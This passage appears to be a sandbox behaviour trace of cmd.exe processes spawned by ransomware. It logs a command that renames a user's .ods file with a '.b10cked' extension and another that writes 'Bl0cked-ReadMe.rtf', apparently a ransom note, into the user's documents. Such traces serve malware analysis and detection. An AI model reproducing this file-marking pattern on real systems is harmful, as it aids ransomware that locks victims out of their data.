_String2="CMDEXTVERSION") returned 8 [0142.503] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 
[0142.503] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0142.503] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0142.503] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0142.503] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0142.503] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x16f518 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0142.503] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x16f518, lpFilePart=0x16f514 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x16f514*="Desktop") returned 0x18 [0142.503] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0142.671] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x16f294 | out: lpFindFileData=0x16f294) returned 0x200058 [0142.671] FindClose (in: hFindFile=0x200058 | out: hFindFile=0x200058) returned 1 [0142.671] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x16f294 | out: lpFindFileData=0x16f294) returned 0x200058 [0142.671] FindClose (in: hFindFile=0x200058 | out: hFindFile=0x200058) returned 1 [0142.671] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x16f294 | out: lpFindFileData=0x16f294) returned 0x200058 [0142.672] FindClose (in: hFindFile=0x200058 | out: hFindFile=0x200058) returned 1 [0142.672] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0142.672] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0142.672] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0142.672] GetEnvironmentStringsW () returned 0x202b38* [0142.672] FreeEnvironmentStringsW (penv=0x202b38) returned 1 [0142.672] GetCurrentDirectoryW (in: nBufferLength=0x104, 
lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0142.673] GetConsoleOutputCP () returned 0x1b5 [0142.673] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0142.673] GetUserDefaultLCID () returned 0x409 [0142.673] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0142.673] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x16f658, cchData=128 | out: lpLCData="0") returned 2 [0142.673] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x16f658, cchData=128 | out: lpLCData="0") returned 2 [0142.673] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x16f658, cchData=128 | out: lpLCData="1") returned 2 [0142.673] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0142.673] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0142.674] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0142.674] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0142.674] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0142.674] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0142.674] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0142.674] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0142.674] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0142.674] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 
[0142.674] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0142.675] GetConsoleTitleW (in: lpConsoleTitle=0x1f0908, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0142.675] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0142.675] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0142.675] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0142.675] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0142.676] _wcsicmp (_String1="move", _String2=")") returned 68 [0142.676] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0142.676] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0142.676] _wcsicmp (_String1="IF", _String2="move") returned -4 [0142.676] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0142.676] _wcsicmp (_String1="REM", _String2="move") returned 5 [0142.676] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0142.680] GetConsoleTitleW (in: lpConsoleTitle=0x16f350, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0142.681] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0142.681] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0142.681] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0142.681] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0142.681] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0142.681] _wcsicmp (_String1="move", _String2="CD") returned 10 [0142.681] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0142.681] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0142.681] _wcsicmp (_String1="move", _String2="REN") returned -5 [0142.681] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0142.681] _wcsicmp (_String1="move", _String2="SET") returned -6 [0142.681] _wcsicmp (_String1="move", _String2="PAUSE") returned 
-3 [0142.681] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0142.681] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0142.681] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0142.681] _wcsicmp (_String1="move", _String2="MD") returned 11 [0142.681] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0142.681] _wcsicmp (_String1="move", _String2="RD") returned -5 [0142.681] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0142.681] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0142.681] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0142.681] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0142.681] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0142.681] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0142.682] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0142.682] _wcsicmp (_String1="move", _String2="VER") returned -9 [0142.682] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0142.682] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0142.682] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0142.682] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0142.682] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0142.682] _wcsicmp (_String1="move", _String2="START") returned -6 [0142.682] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0142.682] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0142.682] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0142.684] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0142.684] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0142.684] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x16f10c, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x16f104, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x16f104*=0x90c08a66, 
lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0142.685] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0142.685] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0142.685] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0142.685] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0142.685] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0142.685] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0142.685] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0142.685] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0142.685] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0142.685] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0142.685] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0142.685] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0142.685] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0142.685] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0142.685] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0142.685] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0142.685] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0142.685] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0142.685] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0142.685] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0142.685] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0142.685] _wcsnicmp 
(_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0142.685] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0142.685] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0142.685] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0142.685] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0142.686] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0142.686] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0142.686] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0142.686] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0142.686] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0142.686] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0142.686] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0142.686] _wcsicmp (_String1="9bQDI69.ods", _String2=".") returned 11 [0142.686] _wcsicmp (_String1="9bQDI69.ods", _String2="..") returned 11 [0142.686] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\9bQDI69.ods" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\5oweks~1\\9bqdi69.ods")) returned 0x20 [0142.687] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x201ea8 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0142.687] SetErrorMode (uMode=0x0) returned 0x0 [0142.687] SetErrorMode (uMode=0x1) returned 0x0 [0142.687] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\9bQDI69.ods", nBufferLength=0x104, lpBuffer=0x16ea94, lpFilePart=0x16ea7c | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\9bQDI69.ods", lpFilePart=0x16ea7c*="9bQDI69.ods") returned 0x35 [0142.687] SetErrorMode (uMode=0x0) returned 0x1 [0142.687] GetFileAttributesW 
(lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\5oweks~1")) returned 0x12 [0142.687] _wcsicmp (_String1="9bQDI69.ods", _String2=".") returned 11 [0142.687] _wcsicmp (_String1="9bQDI69.ods", _String2="..") returned 11 [0142.687] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\9bQDI69.ods" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\5oweks~1\\9bqdi69.ods")) returned 0x20 [0142.687] SetErrorMode (uMode=0x0) returned 0x0 [0142.687] SetErrorMode (uMode=0x1) returned 0x0 [0142.687] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\9bQDI69.ods", nBufferLength=0x104, lpBuffer=0x16ef10, lpFilePart=0x16eca8 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\9bQDI69.ods", lpFilePart=0x16eca8*="9bQDI69.ods") returned 0x35 [0142.687] SetErrorMode (uMode=0x0) returned 0x1 [0142.688] SetErrorMode (uMode=0x0) returned 0x0 [0142.688] SetErrorMode (uMode=0x1) returned 0x0 [0142.688] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\9bQDI69.ods.b10cked", nBufferLength=0x104, lpBuffer=0x16f118, lpFilePart=0x16eca8 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\9bQDI69.ods.b10cked", lpFilePart=0x16eca8*="9bQDI69.ods.b10cked") returned 0x3d [0142.688] SetErrorMode (uMode=0x0) returned 0x1 [0142.688] SetLastError (dwErrCode=0x0) [0142.688] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\9bQDI69.ods.b10cked" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\5oweks~1\\9bqdi69.ods.b10cked")) returned 0xffffffff [0142.688] GetLastError () returned 0x2 [0142.688] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\9bQDI69.ods", fInfoLevelId=0x1, lpFindFileData=0x16e624, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x16e624) returned 0x1f0f08 [0142.688] FindNextFileW (in: hFindFile=0x1f0f08, 
lpFindFileData=0x16e624 | out: lpFindFileData=0x16e624) returned 0 [0142.689] GetLastError () returned 0x12 [0142.689] FindClose (in: hFindFile=0x1f0f08 | out: hFindFile=0x1f0f08) returned 1 [0142.690] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\9bQDI69.ods", fInfoLevelId=0x1, lpFindFileData=0x201c48, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x201c48) returned 0x1f0f08 [0142.691] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\9bQDI69.ods.b10cked", nBufferLength=0x104, lpBuffer=0x16e8bc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\9bQDI69.ods.b10cked", lpFilePart=0x0) returned 0x3d [0142.691] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\9bQDI69.ods", nBufferLength=0x104, lpBuffer=0x16e8bc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\9bQDI69.ods", lpFilePart=0x0) returned 0x35 [0142.691] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\9bQDI69.ods" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\5oweks~1\\9bqdi69.ods")) returned 0x20 [0142.691] MoveFileExW (lpExistingFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\9bQDI69.ods" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\5oweks~1\\9bqdi69.ods"), lpNewFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\9bQDI69.ods.b10cked" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\5oweks~1\\9bqdi69.ods.b10cked"), dwFlags=0x3) returned 1 [0142.691] FindClose (in: hFindFile=0x1f0f08 | out: hFindFile=0x1f0f08) returned 1 [0142.692] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x16e870 | out: _Buffer=" 1") returned 9 [0142.692] _get_osfhandle (_FileHandle=1) returned 0x7 [0142.692] GetFileType (hFile=0x7) returned 0x2 [0142.692] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0142.692] GetConsoleMode (in: 
hConsoleHandle=0x7, lpMode=0x16e7fc | out: lpMode=0x16e7fc) returned 1 [0142.692] _get_osfhandle (_FileHandle=1) returned 0x7 [0142.692] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x16e830 | out: lpConsoleScreenBufferInfo=0x16e830) returned 1 [0142.692] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0142.693] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x16e870 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0142.693] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x16e854, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x16e854*=0x1a) returned 1 [0142.693] _get_osfhandle (_FileHandle=1) returned 0x7 [0142.693] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0142.694] _get_osfhandle (_FileHandle=1) returned 0x7 [0142.694] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0142.694] _get_osfhandle (_FileHandle=0) returned 0x3 [0142.694] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0142.694] SetConsoleInputExeNameW () returned 0x1 [0142.694] GetConsoleOutputCP () returned 0x1b5 [0142.694] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0142.694] SetThreadUILanguage (LangId=0x0) returned 0x409 [0142.694] exit (_Code=0) Process: id = "157" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16920" os_pid = "0xd7c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C type 
\"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\Bl0cked-ReadMe.rtf\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 14606 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 14607 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 14608 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 14609 start_va = 0xf0000 end_va = 0x1effff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 14610 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 14611 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 14612 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 14613 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = 
"pagefile_0x000000007ffb0000" filename = "" Region: id = 14614 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 14615 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 15738 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 15739 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 15740 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 15741 start_va = 0x2d0000 end_va = 0x3cffff entry_point = 0x0 region_type = private name = "private_0x00000000002d0000" filename = "" Region: id = 15742 start_va = 0x5a0000 end_va = 0x5affff entry_point = 0x0 region_type = private name = "private_0x00000000005a0000" filename = "" Region: id = 15743 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 15744 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 15745 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 15746 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename 
= "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 15747 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 15748 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 15749 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 15750 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 15751 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 15752 start_va = 0x1f0000 end_va = 0x2b7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001f0000" filename = "" Region: id = 15753 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 15754 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 15755 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 15756 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = 
pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 15757 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 15758 start_va = 0x2c0000 end_va = 0x2c0fff entry_point = 0x0 region_type = private name = "private_0x00000000002c0000" filename = "" Region: id = 15759 start_va = 0x3d0000 end_va = 0x4d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 15760 start_va = 0x5b0000 end_va = 0x11affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 15761 start_va = 0x11b0000 end_va = 0x1312fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011b0000" filename = "" Thread: id = 214 os_tid = 0xd70 [0140.563] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1eff7c | out: lpSystemTimeAsFileTime=0x1eff7c*(dwLowDateTime=0x8db65b00, dwHighDateTime=0x1d440a9)) [0140.563] GetCurrentProcessId () returned 0xd7c [0140.563] GetCurrentThreadId () returned 0xd70 [0140.563] GetTickCount () returned 0x2c1f7 [0140.563] QueryPerformanceCounter (in: lpPerformanceCount=0x1eff74 | out: lpPerformanceCount=0x1eff74*=19735238217) returned 1 [0140.564] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0140.564] __set_app_type (_Type=0x1) [0140.564] __p__fmode () returned 0x76b331f4 [0140.564] __p__commode () returned 0x76b331fc [0140.564] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0140.564] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0140.564] GetCurrentThreadId () returned 0xd70 [0140.564] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xd70) returned 0x38 [0140.565] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 
